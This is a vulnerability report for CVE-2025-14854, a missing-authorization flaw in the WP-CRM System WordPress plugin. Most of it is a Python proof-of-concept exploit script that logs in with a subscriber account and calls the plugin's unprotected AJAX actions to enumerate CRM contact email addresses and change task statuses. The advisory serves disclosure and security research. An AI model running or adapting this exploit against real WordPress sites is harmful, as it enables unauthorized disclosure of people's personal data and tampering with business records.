Security Vulnerability Report
CVE-2025-14854 (CVSS 5.4, MEDIUM)

Published: 2026-01-14 06:15:53
Last Modified: 2026-04-15 00:35:42
NVD Status: Deferred

Description

The WP-CRM System plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on the wpcrm_get_email_recipients and wpcrm_system_ajax_task_change_status AJAX functions in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers with subscriber-level access and above to enumerate CRM contact email addresses (PII disclosure) and modify CRM task statuses. CVE-2025-62106 is likely a duplicate of this issue.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Exploitability Subscore: 2.8
Impact Subscore: 2.5

Configurations (Affected Products)

WP-CRM System plugin for WordPress <= 3.4.5 (no structured CPE configuration data is available for this record)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14854 PoC - WP-CRM System Privilege Bypass
# Affected: WP-CRM System <= 3.4.5
import requests
import sys
from urllib.parse import urljoin


def exploit_cve_2025_14854(target_url, username, password):
    """
    Exploit for CVE-2025-14854 - WP-CRM System Privilege Bypass
    This PoC demonstrates how an authenticated user with subscriber-level access
    can enumerate email addresses and modify task statuses.
    """
    session = requests.Session()

    # Step 1: Login to WordPress with subscriber account
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }
    response = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed!")
        return False
    print("[+] Successfully logged in with subscriber account")

    # Step 2: Enumerate email addresses via vulnerable AJAX endpoint
    ajax_url = urljoin(target_url, '/wp-admin/admin-ajax.php')

    # PoC 1: Get email recipients (PII disclosure)
    email_payload = {
        'action': 'wpcrm_get_email_recipients',
        'nonce': 'exploit'  # In real attack, obtain valid nonce
    }
    print("[*] Attempting to enumerate email addresses...")
    try:
        email_response = session.post(ajax_url, data=email_payload, timeout=10)
        if email_response.status_code == 200:
            print("[+] Email enumeration request sent")
            print(f"[>] Response preview: {email_response.text[:200]}...")
    except requests.RequestException as e:
        print(f"[-] Email enumeration failed: {e}")

    # PoC 2: Modify task status
    task_payload = {
        'action': 'wpcrm_system_ajax_task_change_status',
        'task_id': '1',
        'new_status': 'completed',
        'nonce': 'exploit'  # In real attack, obtain valid nonce
    }
    print("[*] Attempting to modify task status...")
    try:
        task_response = session.post(ajax_url, data=task_payload, timeout=10)
        if task_response.status_code == 200:
            print("[+] Task modification request sent")
            print(f"[>] Response: {task_response.text[:200]}")
    except requests.RequestException as e:
        print(f"[-] Task modification failed: {e}")

    return True


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://example.com/ subscriber password123")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit_cve_2025_14854(target, user, pwd)

References

Weakness: CWE-862 (Missing Authorization)

Affected code, wcs-dashboard-task-list.php (version 3.4.5):
https://plugins.trac.wordpress.org/browser/wp-crm-system/tags/3.4.5/includes/wcs-dashboard-task-list.php?marks=177-190#L177

Affected code, wcs-functions.php (version 3.4.5):
https://plugins.trac.wordpress.org/browser/wp-crm-system/tags/3.4.5/includes/wcs-functions.php?marks=942-975#L942

Same region of wcs-functions.php in version 3.4.6:
https://plugins.trac.wordpress.org/browser/wp-crm-system/tags/3.4.6/includes/wcs-functions.php?marks=942-975#L942

Wordfence advisory:
https://www.wordfence.com/threat-intel/vulnerabilities/id/da607df4-1dbb-4b1e-ace6-b339cf9e8512?source=cve